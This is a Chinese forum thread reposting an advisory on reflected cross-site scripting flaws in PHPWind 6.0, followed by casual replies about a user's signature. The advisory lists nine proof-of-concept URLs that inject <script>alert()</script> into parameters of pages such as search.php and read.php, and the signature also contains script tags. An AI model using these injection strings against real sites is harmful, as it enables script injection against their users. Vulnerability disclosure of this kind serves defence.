PHPWind 6.0多个跨站脚本漏洞
PHPWind是一款国内比较流行的基于PHP的Web论坛程序。PHPWind在访客注销时没有正确的过滤提交给hack.php、search.php、read.php、post.php、thread.php、 profile.php、sort.php、message.php、userpay.php等页面的请求参数,远程攻击者可以提交恶意请求执行跨站脚本攻击。
测试代码:
http://www.hackqing.cn/hack.php?H_name=bank"><script>alert(/qing/);</script>
http://www.hackqing.cn/search.php?asc=desc"><script>alert(/qing/);</script>
http://www.hackqing.cn/read.php?nowtime="><script>alert(/qing/);</script>
http://www.hackqing.cn/post.php?fid=10"><script>alert(/qing/);</script>
http://www.hackqing.cn/profile.php?action=forumright"><script>alert(/qing/);</script>
http://www.hackqing.cn/thread.php?skinco=black"><script>alert(/qing/);</script>
http://www.hackqing.cn/message.php?action=scout"><script>alert(/qing/);</script>
http://www.hackqing.cn/sort.php?skinco=black"><script>alert(/qing/);</script>
http://www.hackqing.cn/userpay.php?skinco=black"><script>alert(/qing/);</script>
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.phpwind.net <Script>alert("XSS it then Hack it!") </Script> <Script>alert("Check it then Hack it! Debug it then Crack it! ") </Script>
你的签名很有趣啊 alert("Check it then Hack it! Debug it then Crack it! ")
你的签名很有趣啊
mirk 发表于 2010-4-2 01:04 https://bbs.antiy.cn/images/common/back.gif
mirk 发表于 2010-4-2 01:04 https://bbs.antiy.cn/images/common/back.gif
必须的啊!~呵呵!~玩的就是个性!嘿嘿!~
页:
[1]